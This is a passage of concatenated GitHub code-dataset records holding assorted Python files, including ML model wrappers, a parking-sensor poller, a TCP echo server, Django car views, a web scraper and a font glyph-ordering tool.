torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nfrom transformers.modeling_utils import PreTrainedModel\nfrom uncertain.dataloader import prepare_input, prepare_output\n\nfrom blitz.modules import BayesianLinear\n\nclass BNN(PreTrainedModel):\n def __init__(self, config, hidden_size, latent_size, **kwargs):\n super().__init__(config, **kwargs)\n\n self.hidden_size = hidden_size\n self.latent_size = latent_size\n\n self.bnn = BayesianLinear(config.hidden_size, self.latent_size, bias=False)\n self.linear = nn.Linear(self.latent_size,config.hidden_size, bias=False)\n\n self.cossim = nn.CosineSimilarity(dim=0, eps=1e-6)\n\n # Initialize weights and apply final processing\n self.post_init()\n\n def encoder(self, input):\n return self.bnn(input)\n \n def decoder(self, z):\n return self.linear(z)\n \n def latent_perturb(self, z):\n decoded_perturb = [[]] * z.size()[0]\n for i in range(0, self.latent_size):\n ### Create a zero matrix and assign each column with 1.o\n dz = torch.zeros(z.size()).to(self.device)\n dz[:,i] = 1.\n dz = dz * z\n decoded_dz = self.decoder(z=dz)\n for idx, vector in enumerate(decoded_dz):\n if len(decoded_perturb[idx]) == 0:\n decoded_perturb[idx] = [vector]\n else:\n decoded_perturb[idx] += [vector]\n return decoded_perturb\n \n def cos_word_by_dimension(self, x, hidden_states, perturbed_z, input_ids):\n results = {}\n for idx, each_dim in enumerate(perturbed_z):\n coss = torch.Tensor([prepare_input(float('inf')) if self.cos(each_dim,each) < float(0) else self.cos(each_dim,each) for each in hidden_states ])\n results.update({idx:[input_ids[torch.argmin(coss)],coss[torch.argmin(coss)]]})\n x_dim = torch.argmin(torch.Tensor([prepare_input(float('inf')) if self.cos(each_dim,x) < float(0) else self.cos(each_dim,x) for each_dim in perturbed_z ]))\n return results, x_dim\n \n def cos_dimension_by_word(self, x, hidden_states, perturbed_z, input_ids):\n results = {}\n for idx, each in enumerate(hidden_states):\n coss = torch.Tensor([prepare_input(float('inf')) if self.cos(each_dim,each) < float(0) else self.cos(each_dim,each) for each_dim in 
perturbed_z ])\n results.update({input_ids[idx]:[torch.argmin(coss), coss[torch.argmin(coss)]]})\n x_dim = torch.argmin(torch.Tensor([prepare_input(float('inf')) if self.cos(each_dim,x) < float(0) else self.cos(each_dim,x) for each_dim in perturbed_z ]))\n return results, x_dim\n \n def cos_delta_by_dimension(self, delta_x, perturbed_z, hidden_states):\n # start = input_ids.nonzero().min().item()\n # end = input_ids.nonzero().max().item()\n hidden_states = hidden_states\n # input_ids = input_ids[start:end][1:-1]\n # input_ids = input_ids[1:-1]\n delta_x_coss = torch.Tensor([prepare_input(float('inf')) if self.cossim(delta_x, each) < float(0) else self.cossim(delta_x, each) for each in perturbed_z])\n influntial_idx = torch.argmin(delta_x_coss)\n if torch.min(delta_x_coss) == float('inf'):\n delta_x_coss = torch.Tensor([self.cossim(delta_x, each) for each in perturbed_z])\n influntial_idx = torch.argmax(delta_x_coss)\n # word_coss = torch.Tensor([prepare_input(float('inf')) if self.cos(perturbed_z[influntial_idx], each) < float(0) else self.cos(perturbed_z[influntial_idx], each) for each in hidden_states])\n # word_idx = torch.argmin(word_coss)\n word_coss = [self.cossim(perturbed_z[influntial_idx], each) for each in hidden_states]\n return influntial_idx, delta_x_coss[influntial_idx], word_coss\n \n def cos_delta_by_dimension_batches(self, delta_x, perturbed_z, hidden_states):\n influntial_idxs, influntial_idx_coss, word_cosss = [], [], []\n for delta_x_, perturbed_z_, hidden_states_ in zip(delta_x, perturbed_z, hidden_states):\n influntial_idx, influntial_idx_cos, word_coss = self.cos_delta_by_dimension(delta_x_, perturbed_z_, hidden_states_)\n influntial_idxs.append(prepare_output(influntial_idx))\n influntial_idx_coss.append(prepare_output(influntial_idx_cos))\n word_cosss.append(prepare_output(word_coss))\n return influntial_idxs, influntial_idx_coss, word_cosss\n \n def recon_hidden_states(self, hidden_states):\n recon_hiddens = []\n for each_hidden_state in hidden_states:\n latent_z = self.encoder(each_hidden_state)\n recon_hidden_state = self.decoder(latent_z)\n recon_hiddens += [recon_hidden_state]\n return torch.stack(recon_hiddens)\n ","repo_name":"lijiazheng99/CUE","sub_path":"uncertain/models/utils/bnn.py","file_name":"bnn.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"27807916128","text":"\nimport aiohttp,aiofiles,asyncio,time,async_timeout,json\nfrom mqtt_send import send\nfrom network_scan import update_ip\nimport yolov4.detect\nimport time\nimport multiprocessing\nimport testtt\n\ndevices={'8:B6:1F:39:B2:FC':[\"0.0.0.0\",\"lost\"],'44:17:93:7E:3B:7C':[\"192.168.92.35\",\"lost\"],'8:B6:1F:39:AF:20':['0.0.0.0','lost']}\ndevices=update_ip(devices)\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\ndevices_color={\n '8:B6:1F:39:B2:FC':bcolors.OKGREEN,#1\n '44:17:93:7E:3B:7C':bcolors.OKCYAN,#2\n '8:B6:1F:39:AF:20':bcolors.OKBLUE#3\n}\nasync def get_photo(ip,name):\n global devices\n print('[MAIN-PROCESS]',devices_color[name],'get_photo:',name,ip,bcolors.ENDC)\n for i in devices:\n devices[i][1]=\"lost\"\n try:\n # print(name)\n async with async_timeout.timeout(2):\n async with aiohttp.ClientSession() as session:\n async with session.get(\"http://\"+ip+\"/check\") as resp:\n 
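                    # the Content-Type header decides the branch below: an 'image/jpeg' response is saved to disk, any other body is returned as a text status\n                    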
print(resp.headers['Content-Type'])\n\n if resp.status == 200:\n devices[name][1]=\"alive\"\n # print(devices[name][1])\n if resp.headers['Content-Type']==\"image/jpeg\":\n f = await aiofiles.open(\"output/\"+str(name)+\".jpeg\", mode='wb')\n await f.write(await resp.read())\n await f.close()\n print('[MAIN-PROCESS]',devices_color[name],'get_photo',name,'done',bcolors.ENDC,'image')\n return ['image','',name]\n else:\n return ['text',await resp.read(),name]\n else:\n return ['err','400']\n except:\n # if name=='44:17:93:7E:3B:7C':\n print('[MAIN-PROCESS]',devices_color[name],'get_photo',name,'done',bcolors.ENDC,'err')\n return ['err','',name]\n \ndef image_callback(result):# input for a dict(result,mac)\n print('\\t[SUB-PROCESS] recognize result:',result)\n err=[]\n if result['str']:\n if len(result['str'])<6 or len(result['str'])>7:\n err.append('length_error')\n else:\n err.append('non_return')\n \n print('\\t[SUB-PROCESS] recognize error:',result)\n if len(err)>0: #有錯誤的發生\n #錯誤處理\n msg=[{\"mac\":result[\"mac\"]},{\"error\":err}]\n else:\n msg=[{\"mac\":result[\"mac\"]},{\"license_plate\":result[\"str\"],\"status\":\"inuse\"}]\n msg=json.dumps(msg)\n print('\\t[SUB-PROCESS] Parking image type send:',msg)\n send(msg,'Parking')# update parking errors\n\n # print('recognized:',input)\n \nasync def main():\n # 建立 Task 列表\n tasks = []\n for i in devices:\n task=asyncio.create_task(get_photo(devices[i][0],i))\n # task.add_done_callback(print(task.result))\n tasks.append(task)\n\n for k in tasks:\n await k\n result=k.result()# if get one ->do one\n print('\\t\\033[93m[SUB-PROCESS] task_result',result,'\\033[0m')\n if result[0]=='image':\n # print('fuck')\n Pool.apply_async(yolov4.detect.main,args=('output/'+result[2]+'.jpeg',),callback=print,error_callback=print)\n Pool.apply_async(testtt.recognize,args=(result[2],),callback=image_callback,error_callback=print)\n elif result[0]=='text':\n if result[1]=='There\\'s a car inside!':#inuse\n msg=[{\"mac\":result[2]},{\"status\":\"inuse\"}]\n else:#empty\n msg=[{\"mac\":result[2]},{\"status\":\"empty\"}]\n msg=json.dumps(msg)\n send(msg,'Parking')\n return #need to process\n\n\nif __name__=='__main__':# main time loop\n print('updated:\\n',devices)\n Pool=multiprocessing.Pool(processes=1)\n \n ts=0\n while True:\n te=time.monotonic()\n if te-ts>15 or ts==0:\n print('[MAIN-PROCESS]-'*20)\n result=asyncio.run(main())\n \n msg=[]\n for i in devices:\n msg.append([{\"mac\":i},{\"status\":devices[i][1]}])\n print('[MAIN-PROCESS] send:',msg)\n msg=json.dumps(msg)\n send(msg)# send to mqtt\n ts=te\n","repo_name":"Timothychen00/RoadParking","sub_path":"photo.py","file_name":"photo.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"39288545425","text":"import torchvision.models as models\nfrom torchvision.models.detection import faster_rcnn, fasterrcnn_resnet50_fpn, retinanet_resnet50_fpn\nfrom torch import nn\nimport torch\nimport math \nimport torchvision\nimport torch.nn.functional as F \nfrom typing import OrderedDict\nclass RetinaNet(nn.Module): \n def __init__(self,cfg):\n super(RetinaNet, self).__init__()\n if cfg.get('customBackbone',None):\n backbone = torchvision.models.detection.backbone_utils.resnet_fpn_backbone(cfg.customBackbone, pretrained = cfg.pretrained_backbone, returned_layers=[2, 3, 4],\n extra_blocks=torchvision.ops.feature_pyramid_network.LastLevelP6P7(256, 256), trainable_layers=cfg.get('trainable_layers',5))\n self.model = 
torchvision.models.detection.RetinaNet(backbone=backbone, num_classes=2)\n elif cfg.get('custom_anchors',False):\n anchor_sizes = ((16,), (32,), (64,), (128,), (256,))\n aspect_ratios = ((0.8, 1.0, 1.2),) * len(anchor_sizes)\n anchor_generator = torchvision.models.detection.retinanet.AnchorGenerator(anchor_sizes,\n aspect_ratios)\n self.model = retinanet_resnet50_fpn(\n pretrained = cfg.pretrained,\n pretrained_backbone = cfg.pretrained_backbone,\n trainable_backbone_layers = cfg.get('trainable_layers',5),\n anchor_generator = anchor_generator\n )\n \n else: \n self.model = retinanet_resnet50_fpn(\n pretrained = cfg.pretrained,\n pretrained_backbone = cfg.pretrained_backbone,\n trainable_backbone_layers = cfg.get('trainable_layers',5)\n )\n\n\n\n # replace classification layer \n in_features = self.model.head.classification_head.conv[0].in_channels\n num_anchors = self.model.head.classification_head.num_anchors\n self.model.head.classification_head.num_classes = cfg.num_classes\n\n cls_logits = torch.nn.Conv2d(in_features, num_anchors * cfg.num_classes, kernel_size = 3, stride=1, padding=1)\n torch.nn.init.normal_(cls_logits.weight, std=0.01) # as per pytorch code\n torch.nn.init.constant_(cls_logits.bias, -math.log((1 - 0.01) / 0.01)) # as per pytorcch code \n # assign cls head to model\n self.model.head.classification_head.cls_logits = cls_logits\n\n def get_model(self):\n return self.model\n","repo_name":"FinnBehrendt/node21-submit","sub_path":"src/models/modules/RetinaNet.py","file_name":"RetinaNet.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"37106089244","text":"import sys\ninput=sys.stdin.readline\n\nstr2=input().strip()\nstr1=input().strip()\ndp=[[0 for _ in range(len(str2)+1)]for _ in range(len(str1)+1)]\nresult=0\nfor i in range(1,len(str1)+1):\n for j in range(1,len(str2)+1):\n if str1[i-1]==str2[j-1]:\n dp[i][j]=dp[i-1][j-1]+1\n result=max((dp[i][j]),result)\n\nprint(result)\n","repo_name":"styughjvbn/Algorithm_study","sub_path":"week11-20/week19/174_5582.py","file_name":"174_5582.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30027284307","text":"\nclass Smoothie:\n prices = {\n \"Strawberries\" : \"$1.50\",\n \"Banana\" : \"$0.50\",\n \"Mango\" : \"$2.50\",\n \"Blueberries\" : \"$1.00\",\n \"Raspberries\" : \"$1.00\",\n \"Apple\" : \"$1.75\",\n \"Pineapple\" : \"$3.50\"\n }\n def __init__(self,ingredients):\n self.ingredients = ingredients\n \n def get_cost(self):\n tot_cost = 0\n for ingredient in self.ingredients:\n tot_cost += float(Smoothie.prices[ingredient][1:])\n return '${:.2f}'.format(tot_cost)\n \n def get_price(self):\n return '${:.2f}'.format(round(float(self.get_cost()[1:]) + 1.5*float(self.get_cost()[1:]), 2))\n \n def get_name(self):\n my_ingredients = sorted(self.ingredients)\n def change_name(names):\n new_lst = []\n for name in names:\n if 'rries' in name:\n new_lst.append(name.replace('rries', 'rry'))\n else:\n new_lst.append(name)\n return new_lst\n my_ingredients = change_name(my_ingredients)\n if len(my_ingredients) == 1:\n name = my_ingredients[0] + ' Smoothie'\n else:\n name = ''\n for ingredient in my_ingredients:\n name += ingredient + ' '\n name += 'Fusion'\n return 
name\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"yuPWwSbCGPm2KzSzx_17.py","file_name":"yuPWwSbCGPm2KzSzx_17.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"73182966171","text":"import urllib.request\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ndef get_data(phone, page):\r\n    url = f'https://www.pdflibr.com/SMSContent/{phone}?page={page}'\r\n    print(url)\r\n\r\n    try:\r\n        response = urllib.request.urlopen(url).read()\r\n    except:\r\n        response = get_data(phone, page)\r\n\r\n    return response\r\n\r\n\r\nphone = 3\r\npages = list(range(1, 101))\r\ntables = []\r\nfor page in pages:\r\n    res = get_data(phone, page)\r\n    soup = BeautifulSoup(res.decode(), 'lxml')\r\n    table = soup.findAll('table')[1]\r\n    tables.append(table)\r\nwith open(f'phone_{phone}.txt', 'wb') as f:\r\n    for table in tables:\r\n        f.write(table.get_text().encode('utf-8'))","repo_name":"cyoahs/spider_for_pdflibr","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"32085898263","text":"from socket import * # Módulo/biblioteca para a utilização de sockets\r\n\r\nserverData = input('Host/IP Port [Default: localhost 8080]: ') # Recebe os dados da conexão\r\n\r\nif serverData == '': # Define padrão para dados da conexão\r\n    serverName = 'localhost' # Define o nome do servidor (endereço ou IP do servidor)\r\n    serverPort = 8080 # Define a porta do servidor\r\nelse:\r\n    serverName, serverPort = serverData.split()\r\n    serverPort = int(serverPort)\r\n\r\nserverSocket = socket(AF_INET, SOCK_STREAM) # Cria o socket do servidor, indicando que a rede está usando IPv4 e que o socket será TCP\r\n\r\nprint('<<< Socket created >>>')\r\n\r\nserverSocket.bind(('',serverPort)) # Designa número de porta ao socket do servidor\r\n\r\nprint('<<< Socket bind complete >>>')\r\n\r\n# print('The server is ready to receive')\r\n\r\ncount = 0\r\n\r\nserverSocket.listen(1) # Escuta requisições de conexão TCP do cliente, indicando número máximo de conexões em fila como 1\r\n\r\nwhile 1:\r\n\r\n    connectionSocket, addr = serverSocket.accept() # Cria um novo socket no servidor (connectionSocket) para o cliente que bateu à porta. Cliente e servidor completam apresentação criando uma conexão TCP\r\n    \r\n    sentence = connectionSocket.recv(1024) # Recebe mensagem do cliente. 
Define tamanho do buffer como 1024\n\n if sentence.decode() == 'quit': # Fecha conexão se a mensagem do usuário for \"quit\"\n connectionSocket.close()\n break\n\n print('Message [{}]: '.format(addr), sentence.decode()) # Imprime a mensagem vinda do cliente na tela\n\n modifiedMessage = '[{}] OK ::: {}'.format(count, sentence.decode()).encode() # Modifica a mensagem para enviar de volta ao cliente\n connectionSocket.send(modifiedMessage) # Envia mensagem pelo socket específico do cliente para a conexão TCP\n\n count += 1 # Incrementa contador de mensagens\n\n connectionSocket.close() # Fecha o socket, fechando a conexão TCP entre cliente e servidor\n\nprint('<<< Closing connection on server side >>>')","repo_name":"Beilfuss/client-server","sub_path":"TCPServer.py","file_name":"TCPServer.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16824492618","text":"from PIL import ImageFont, Image, ImageDraw\nimport os,sys\ndef toImage(imageFile,x,y,text,pathName,size):\n oo = os.path.dirname(os.path.realpath(sys.argv[0]))\n imageFile = oo + imageFile\n pathName = oo + pathName\n # 导入本地字体路径及设置字体大小\n font = ImageFont.truetype(oo+\"/images/字体/kuaile.ttf\", size)\n # 打开本地所需图片\n im1 = Image.open(imageFile)\n\n # 在图片上添加文字\n draw = ImageDraw.Draw(im1)\n draw.text(xy=(x, y), text=text, font=font,fill=(1, 0, 0))\n\n\n im1.save(pathName)\n\n'''\nline=text\nsize=多少字换行\n'''\ndef line_break(line,size):\n LINE_CHAR_COUNT = size * 2 # 每行字符数:30个中文字符(=60英文字符)\n TABLE_WIDTH = 4\n ret = ''\n width = 0\n for c in line:\n if len(c.encode('utf8')) == 3: # 中文\n if LINE_CHAR_COUNT == width + 1: # 剩余位置不够一个汉字\n width = 2\n ret += '\\n' + c\n else: # 中文宽度加2,注意换行边界\n width += 2\n ret += c\n else:\n if c == '\\t':\n space_c = TABLE_WIDTH - width % TABLE_WIDTH # 已有长度对TABLE_WIDTH取余\n ret += ' ' * space_c\n width += space_c\n elif c == '\\n':\n width = 0\n ret += c\n else:\n width += 1\n ret += c\n if width >= LINE_CHAR_COUNT:\n ret += '\\n'\n width = 0\n if ret.endswith('\\n'):\n return ret\n return ret + '\\n'\n","repo_name":"cat991/py-go-cqhttp","sub_path":"botstart/util/textToImg.py","file_name":"textToImg.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"17934994562","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User\nfrom .forms import UserForm, CarForm\nfrom .models import Car\n\ndef home(request):\n return render(request, 'myapp/home.html')\n\ndef login_view(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('car_list')\n return render(request, 'myapp/login.html')\n\ndef register(request):\n if request.method == 'POST':\n form = UserForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('login')\n else:\n form = UserForm()\n return render(request, 'myapp/register.html', {'form': form})\n\ndef car_list(request):\n cars = Car.objects.all()\n return render(request, 'myapp/car_list.html', {'cars': cars})\n\ndef car_detail(request, car_id):\n car = Car.objects.get(id=car_id)\n return render(request, 'myapp/car_detail.html', {'car': car})\n\ndef add_car(request):\n if request.method == 'POST':\n form = 
CarForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('car_list')\n else:\n form = CarForm()\n return render(request, 'myapp/add_car.html', {'form': form})\n\ndef edit_car(request, car_id):\n car = Car.objects.get(id=car_id)\n if request.method == 'POST':\n form = CarForm(request.POST, instance=car)\n if form.is_valid():\n form.save()\n return redirect('car_list')\n else:\n form = CarForm(instance=car)\n return render(request, 'myapp/edit_car.html', {'form': form})\n","repo_name":"ToDpain/IS-424-Project","sub_path":"HelloWorld/myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12736263074","text":"import json\nfrom logging import Logger\nimport redis\n\nfrom alocacao import bootstrap, config\nfrom alocacao.dominio import comandos\n\n\nlogger = Logger(__name__)\nr = redis.Redis(**config.get_redis_host_and_port())\nbus = bootstrap.bootstrap()\n\n\ndef main():\n pubsub = r.pubsub(ignore_subscribe_messages=True)\n pubsub.subscribe('altera_quantidade_lote')\n\n for m in pubsub.listen():\n handle_altera_quantidade_lote(m)\n\n\ndef handle_altera_quantidade_lote(m):\n logger.debug('manipulando %s', m)\n data = json.loads(m['data'])\n cmd = comandos.AlterarQuantidadeLote(\n ref=data['ref_lote'], qtd_nova=data['qtd_nova']\n )\n bus.handle(cmd)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ralphribeiro/APWP-T2","sub_path":"src/alocacao/aplicacao/redis_eventconsumer.py","file_name":"redis_eventconsumer.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28816076927","text":"#!/usr/bin/env python\n# encoding: utf8\nfrom __future__ import print_function\nimport os, sys, plistlib, json, re\nfrom collections import OrderedDict\nfrom argparse import ArgumentParser\nfrom ConfigParser import RawConfigParser\nfrom fontTools import ttLib\nfrom robofab.objects.objectsRF import OpenFont\n\n\n# Regex matching \"default\" glyph names, like \"uni2043\" and \"u01C5\"\nuniNameRe = re.compile(r'^u(?:ni)([0-9A-F]{4,8})$')\n\n\nclass PList:\n def __init__(self, filename):\n self.filename = filename\n self.plist = None\n\n def load(self):\n self.plist = plistlib.readPlist(self.filename)\n\n def save(self):\n if self.plist is not None:\n plistlib.writePlist(self.plist, self.filename)\n\n def get(self, k, defaultValue=None):\n if self.plist is None:\n self.load()\n return self.plist.get(k, defaultValue)\n\n def __getitem__(self, k):\n if self.plist is None:\n self.load()\n return self.plist[k]\n\n def __setitem__(self, k, v):\n if self.plist is None:\n self.load()\n self.plist[k] = v\n\n def __delitem__(self, k):\n if self.plist is None:\n self.load()\n del self.plist[k]\n\n\ndef parseAGL(filename): # -> { 2126: 'Omega', ... 
}\n m = {}\n with open(filename, 'r') as f:\n for line in f:\n # Omega;2126\n # dalethatafpatah;05D3 05B2 # higher-level combinations; ignored\n line = line.strip()\n if len(line) > 0 and line[0] != '#':\n name, uc = tuple([c.strip() for c in line.split(';')])\n if uc.find(' ') == -1:\n # it's a 1:1 mapping\n m[int(uc, 16)] = name\n return m\n\n\ndef revCharMap(ucToNames):\n # {2126:['Omega','Omegagr']} -> {'Omega':2126, 'Omegagr':2126}\n # {2126:'Omega'} -> {'Omega':2126}\n m = {}\n if len(ucToNames) == 0:\n return m\n\n lists = True\n for v in ucToNames.itervalues():\n lists = not isinstance(v, str)\n break\n\n if lists:\n for uc, names in ucToNames.iteritems():\n for name in names:\n m[name] = uc\n else:\n for uc, name in ucToNames.iteritems():\n m[name] = uc\n \n return m\n\n\ndef loadJSONGlyphOrder(jsonFilename):\n gol = None\n if jsonFilename == '-':\n gol = json.load(sys.stdin)\n else:\n with open(jsonFilename, 'r') as f:\n gol = json.load(f)\n if not isinstance(gol, list):\n raise Exception('expected [[string, int|null]')\n if len(gol) > 0:\n for v in gol:\n if not isinstance(v, list):\n raise Exception('expected [[string, int|null]]')\n break\n return gol\n\n\ndef loadTTGlyphOrder(font):\n if isinstance(font, str):\n font = ttLib.TTFont(font)\n\n if not 'cmap' in font:\n raise Exception('missing cmap table')\n \n bestCodeSubTable = None\n bestCodeSubTableFormat = 0\n\n for st in font['cmap'].tables:\n if st.platformID == 0: # 0=unicode, 1=mac, 2=(reserved), 3=microsoft\n if st.format > bestCodeSubTableFormat:\n bestCodeSubTable = st\n bestCodeSubTableFormat = st.format\n\n ucmap = {}\n if bestCodeSubTable is not None:\n for cp, glyphname in bestCodeSubTable.cmap.items():\n ucmap[glyphname] = cp\n\n gol = []\n for name in font.getGlyphOrder():\n gol.append((name, ucmap.get(name)))\n\n return gol\n\n\ndef loadSrcGlyphOrder(jsonFilename, fontFilename): # -> [ ('Omegagreek', 2126|None), ...]\n if jsonFilename:\n return loadJSONGlyphOrder(jsonFilename)\n elif fontFilename:\n return loadTTGlyphOrder(fontFilename.rstrip('/ '))\n return None\n\n\ndef loadUFOGlyphNames(ufoPath):\n font = OpenFont(ufoPath)\n\n libPlist = PList(os.path.join(ufoPath, 'lib.plist')) \n orderedNames = libPlist['public.glyphOrder'] # [ 'Omega', ...]\n \n # append any glyphs that are missing in orderedNames\n allNames = set(font.keys())\n for name in orderedNames:\n allNames.discard(name)\n for name in allNames:\n orderedNames.append(name)\n \n ucToNames = font.getCharacterMapping() # { 2126: [ 'Omega', ...], ...}\n nameToUc = revCharMap(ucToNames) # { 'Omega': 2126, ...}\n\n gol = OrderedDict() # OrderedDict{ ('Omega', 2126|None), ...}\n for name in orderedNames:\n gol[name] = nameToUc.get(name)\n # gol.append((name, nameToUc.get(name)))\n\n return gol, ucToNames, nameToUc, libPlist\n\n\ndef saveUFOGlyphOrder(libPlist, orderedNames, dryRun):\n libPlist['public.glyphOrder'] = orderedNames\n\n roboSort = libPlist.get('com.typemytype.robofont.sort')\n if roboSort is not None:\n # lib['com.typemytype.robofont.sort'] has schema\n # [ { type: \"glyphList\", ascending: [glyphname, ...] 
}, ...]\n for i in range(len(roboSort)):\n ent = roboSort[i]\n if isinstance(ent, dict) and ent.get('type') == 'glyphList':\n roboSort[i] = {'type':'glyphList', 'ascending':orderedNames}\n break\n\n print('Writing', libPlist.filename)\n if not dryRun:\n libPlist.save()\n\n\ndef getConfigResFile(config, basedir, name):\n fn = os.path.join(basedir, config.get(\"res\", name))\n if not os.path.isfile(fn):\n basedir = os.path.dirname(basedir)\n fn = os.path.join(basedir, config.get(\"res\", name))\n if not os.path.isfile(fn):\n fn = None\n return fn\n\n\ndef main():\n argparser = ArgumentParser(description='Rewrite glyph order of UFO fonts')\n\n argparser.add_argument(\n '-dry', dest='dryRun', action='store_const', const=True, default=False,\n help='Do not modify anything, but instead just print what would happen.')\n\n argparser.add_argument(\n '-src-json', dest='srcJSONFile', metavar='', type=str,\n help='JSON file to read glyph order from.' +\n ' Should be a list e.g. [[\"Omega\", 2126], [\".notdef\", null], ...]')\n\n argparser.add_argument(\n '-src-font', dest='srcFontFile', metavar='', type=str,\n help='TrueType or OpenType font to read glyph order from.')\n\n argparser.add_argument(\n '-out', dest='outFile', metavar='', type=str,\n help='Write each name per line to ')\n\n argparser.add_argument(\n 'dstFontsPaths', metavar='', type=str, nargs='+', help='UFO fonts to update')\n\n args = argparser.parse_args()\n dryRun = args.dryRun\n\n if args.srcJSONFile and args.srcFontFile:\n argparser.error('Both -src-json and -src-font specified -- please provide only one.')\n\n srcGol = loadSrcGlyphOrder(args.srcJSONFile, args.srcFontFile)\n if srcGol is None:\n argparser.error('No source provided (-src-* argument missing)')\n\n # Load Adobe Glyph List database\n srcDir = os.path.dirname(args.dstFontsPaths[0])\n config = RawConfigParser(dict_type=OrderedDict)\n config.read(os.path.join(srcDir, 'fontbuild.cfg'))\n aglUcToName = parseAGL(getConfigResFile(config, srcDir, 'agl_glyphlistfile'))\n aglNameToUc = revCharMap(aglUcToName)\n\n glyphorderUnion = OrderedDict()\n\n for dstFontPath in args.dstFontsPaths:\n glyphOrder, ucToNames, nameToUc, libPlist = loadUFOGlyphNames(dstFontPath)\n\n newGol = OrderedDict()\n for name, uc in srcGol:\n\n if uc is None:\n # if there's no unicode associated, derive from name if possible\n m = uniNameRe.match(name)\n if m:\n try:\n uc = int(m.group(1), 16)\n except:\n pass\n if uc is None:\n uc = aglNameToUc.get(name)\n\n # has same glyph mapped to same unicode\n names = ucToNames.get(uc)\n if names is not None:\n for name in names:\n # print('U %s U+%04X' % (name, uc))\n newGol[name] = uc\n continue\n \n # has same name in dst?\n uc2 = glyphOrder.get(name)\n if uc2 is not None:\n # print('N %s U+%04X' % (name, uc2))\n newGol[name] = uc2\n continue\n\n # Try AGL[uc] -> name == name\n if uc is not None:\n name2 = aglUcToName.get(uc)\n if name2 is not None:\n uc2 = glyphOrder.get(name2)\n if uc2 is not None:\n # print('A %s U+%04X' % (name2, uc2))\n newGol[name2] = uc2\n continue\n \n # else: ignore glyph name in srcGol not found in target\n # if uc is None:\n # print('x %s -' % name)\n # else:\n # print('x %s U+%04X' % (name, uc))\n\n\n # add remaining glyphs from original glyph order\n for name, uc in glyphOrder.iteritems():\n if name not in newGol:\n # print('E %s U+%04X' % (name, uc))\n newGol[name] = uc\n\n orderedNames = []\n for name in newGol.iterkeys():\n orderedNames.append(name)\n glyphorderUnion[name] = True\n\n saveUFOGlyphOrder(libPlist, orderedNames, 
dryRun)\n\n if args.outFile:\n print('Write', args.outFile)\n glyphorderUnionNames = glyphorderUnion.keys()\n if not dryRun:\n with open(args.outFile, 'w') as f:\n f.write('\\n'.join(glyphorderUnionNames) + '\\n')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"rsms/inter","sub_path":"misc/tools/rewrite-glyphorder.py","file_name":"rewrite-glyphorder.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","stars":16264,"dataset":"github-code","pt":"32"} +{"seq_id":"39711166039","text":"atBats = int(input())\nsum = 0.0\n\nnums = list(map(int, input().split()))\n\nok = list(filter((-1).__ne__, nums))\n\nfor i in range(len(ok)):\n sum += ok[i]\n \n \nprint(sum/len(ok))","repo_name":"a5vh/kattis","sub_path":"batter.py","file_name":"batter.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1990856240","text":"import codecs\nimport os\nfrom setuptools import setup\n\n\nname = 'cryptoyaml'\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n\ndef read(*parts):\n \"\"\"\n Build an absolute path from *parts* and and return the contents of the\n resulting file. Assume UTF-8 encoding.\n \"\"\"\n with codecs.open(os.path.join(HERE, *parts), \"rb\", \"utf-8\") as f:\n return f.read()\n\n\nLONG = (\n read(\"README.rst\") + \"\\n\\n\" +\n \"Release Information\\n\" +\n \"===================\\n\\n\" +\n read(\"CHANGES.rst\") + \"\\n\\n\"\n)\n\n\nsetup(\n name=name,\n version_format='{tag}.{commitcount}+{gitsha}',\n url='https://github.com/getsenic/senic.cryptoyaml',\n author='Senic GmbH',\n author_email='tom@senic.com',\n description='A python library to manage encrypted YAML files.',\n license='BSD 2-Clause License',\n long_description=LONG,\n classifiers=[\n \"Programming Language :: Python\",\n ],\n packages=[name],\n include_package_data=True,\n package_dir={name: 'cryptoyaml'},\n package_data={\n name: [\n '.coveragerc',\n 'tests/*.py',\n 'tests/data/*.*',\n ],\n },\n 